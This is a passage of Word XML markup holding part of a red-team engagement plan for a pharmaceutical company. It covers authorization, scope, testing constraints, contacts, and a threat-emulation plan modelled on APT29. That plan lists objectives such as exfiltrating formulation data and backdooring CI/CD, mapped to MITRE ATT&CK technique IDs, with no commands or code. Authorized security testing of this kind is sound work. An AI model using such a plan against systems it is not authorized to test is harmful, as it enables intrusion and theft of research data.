      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:p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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Engagement Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Client:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PharmaTech</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Global Ltd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Authorization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CISO Dr. Sarah Mitchell (Nov 1, 2025)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> November 15–29, 2025 (2 weeks)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Engagement Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gray-box assessment (limited infrastructure knowledge)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:p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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scope Definition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:p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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In-Scope Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AWS Cloud Infrastructure (VPC: 10.20.0.0/16)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EC2 web servers (research portal)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S3 buckets (clinical trial data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RDS database (drug formulation data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>On-premises Active Directory (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pharmatech.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) with 2 Domain Controllers, 15 File Servers, 200 workstations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CI/CD Pipeline including Jenkins, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GitLab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, Docker registry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:p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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Out-of-Scope:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Production patient management systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Live clinical trial databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Third-party partner networks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Physical security testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:p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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Testing Constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">No destructive attacks or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Limit exfiltration to 100MB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Operate 9 AM – 6 PM GMT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stop if unintended disruption occurs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:p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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Professional red team exercises follow MITRE ATT&amp;CK for TTP mapping and the Cyber Kill Chain for attack progression [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>38][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>39].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:p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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Communication Protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Primary Contact: James Chen (Blue Team Lead)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Emergency Hotline: +44 20 7946 0958</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Daily Briefing: 5 PM status email</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Critical findings reported within 2 hours</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.2 Threat Emulation Plan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:p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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Threat Actor Profile:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> APT29 (Cozy Bear)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Motivation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pharmaceutical IP theft targeting COVID-19 vaccine research [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>40][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>41]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Historical TTPs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spear-phishing, internet-facing application exploitation, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LOLBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, cloud targeting, persistent access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Past Activity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Targeted vaccine research with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WellMess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WellMail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> malware in 2020 [42]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:p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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attack Objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exfiltrate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> drug formulation data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Compromise CI/CD pipeline for supply chain positioning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Establish persistent backdoor access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:p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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Mapping:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Initial Access:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1566.001 (Spear-phishing Attachment) [44]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Execution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1059.001 (PowerShell) [45]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Persistence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1053.005 (Scheduled Task) [46]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Privilege Escalation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1134.001 (Token Impersonation) [47]</w:t>
      </w:r>
